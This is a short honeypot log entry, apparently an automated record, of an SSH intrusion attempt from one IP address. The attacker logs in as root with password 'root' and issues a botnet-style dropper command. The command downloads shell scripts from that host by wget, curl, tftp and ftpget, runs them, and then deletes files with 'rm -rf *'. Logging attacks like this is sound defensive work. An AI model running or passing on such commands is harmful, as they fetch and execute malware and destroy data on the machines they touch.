honeypots.tk

Record Observations : 159.203.8.212 ssh Web script execution 159.203.8.212 VIJ1TH0YY66Q6PUL

<< Back

159.203.8.212 client username 'root' and password 'root' entered
159.203.8.212 client command : 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://159.203.8.212/8UsA.sh; curl -O http://159.203.8.212/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 159.203.8.212 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 159.203.8.212; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 159.203.8.212 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *'
Author: Honeypots.tk Robot